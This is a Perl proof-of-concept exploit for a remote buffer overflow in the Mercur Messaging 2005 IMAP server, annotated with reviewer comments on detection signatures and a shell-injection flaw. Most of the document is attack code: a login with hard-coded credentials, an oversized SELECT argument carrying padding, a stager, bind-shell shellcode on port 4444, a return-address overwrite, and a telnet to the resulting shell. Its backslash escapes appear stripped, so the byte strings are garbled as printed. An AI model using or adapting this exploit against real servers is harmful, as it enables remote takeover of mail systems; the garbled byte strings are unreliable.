
# Title : Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit
# Published : 2007-01-15
# Author : Jacopo Cervini


#!/bin/perl
# tested on win2k server SP4 English
# ATTENTION! If you have another valid account you must change the offsets; this is only a PoC
#

use IO::Socket::INET;

# NOTE(review): the script runs without `use strict; use warnings;`, so typos
# in variable names and unintended interpolation go unreported.

# Target host is the first (and only) command-line argument; no validation is
# done on it before it is used for the connection and, later, in a shell command.
my $host = shift(@ARGV);
my $port = 143;   # IMAP, plaintext (no STARTTLS/TLS is negotiated below)
my $reply;
my $request;
# Hard-coded credentials: the author's header notes the offsets below are tied
# to this account, so a different account invalidates the PoC.
my $user = "test";
my $pass = "test";

# Two padding buffers placed before and after the small stager; sizes (8 and 20)
# are part of the offsets the header warns about.
my $nop = "x90"x8;

my $nop1 = "x90"x20;

# Value written over the saved return address; the commented-out alternative
# below carries the author's note that it is a `call edi` inside mcrimap4.exe.
my $ret = "x42xb2xc1x40";

#my $ret = "x42x42x42x42"; #call edi in mcrimap4.exe

# Short stager, described by the author in the listing that follows.
my $asm="x8bxc7x83xc0x23x50xc3";

#	asm is a binary translation of these assembly instructions; eax now has the correct memory address for the shellcode
#
#	8BC7           MOV EAX,EDI
#	83C0 23        ADD EAX,23
#	50             PUSH EAX                                
#	C3             RETN




#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host

# Payload: per the author's notes above, a bind shell on TCP/4444. From a
# detection standpoint, a successful run leaves a new listener on 4444 on the
# mail server and an inbound connection to it from the attacking host.
my $shellcode = 
"x59x81xc9xd3x62x30x20x41x43x4dx64".
"x64x99x96x8Dx7ExE8x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49x1C".
"x8Bx09x8Bx69x08xB6x03x2BxE2x66xBAx33x32x52x68x77".
"x73x32x5Fx54xACx3CxD3x75x06x95xFFx57xF4x95x57x60".
"x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFF".
"x47x8Bx34xBBx03xF5x99xACx34x71x2AxD0x3Cx71x75xF7".
"x3Ax54x24x1Cx75xEAx8Bx59x24x03xDDx66x8Bx3Cx7Bx8B".
"x59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3BxF7x75xB4".
"x5Ex54x6Ax02xADxFFxD0x88x46x13x8Dx48x30x8BxFCxF3".
"xABx40x50x40x50xADxFFxD0x95xB8x02xFFx11x5cx32xE4".
"x50x54x55xADxFFxD0x85xC0x74xF8xFEx44x24x2DxFEx44".
"x24x2cx83xEFx6CxABxABxABx58x54x54x50x50x50x54x50".
"x50x56x50xFFx56xE4xFFx56xE8";

# Plain TCP connection; the die message below does not include $!, so a
# failed connect gives no reason.
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!n";

# Read the server greeting (return value of recv is not checked).
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
# Authenticated attack: a valid LOGIN precedes the malformed command, so the
# server log will show a successful login for this account right before the
# crash. Credentials cross the wire in the clear.
$request = "a001 LOGIN $user $passrn";

send $socket, $request, 0;
print "[+] Sent loginn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

# The overflow is delivered as the mailbox-name argument of SELECT: padding,
# stager, more padding, payload, then the return-address overwrite. A SELECT
# whose argument is this long (and non-printable) is the observable signature
# for IDS rules and for reviewing IMAP protocol logs.
$request = " SELECT " . $nop . $asm . $nop1 . $shellcode . $ret ."rn";

send $socket, $request, 0;
print "[+] Sent chunkn";

# NOTE(review): $host comes straight from @ARGV and is interpolated into a
# shell command here, so the script itself is exposed to shell injection via
# its argument; the list form `system('telnet', $host, '4444')` avoids the shell.
print " + Connect on port 4444 of $host ...n";
system("telnet $host 4444");

close $socket;
exit;
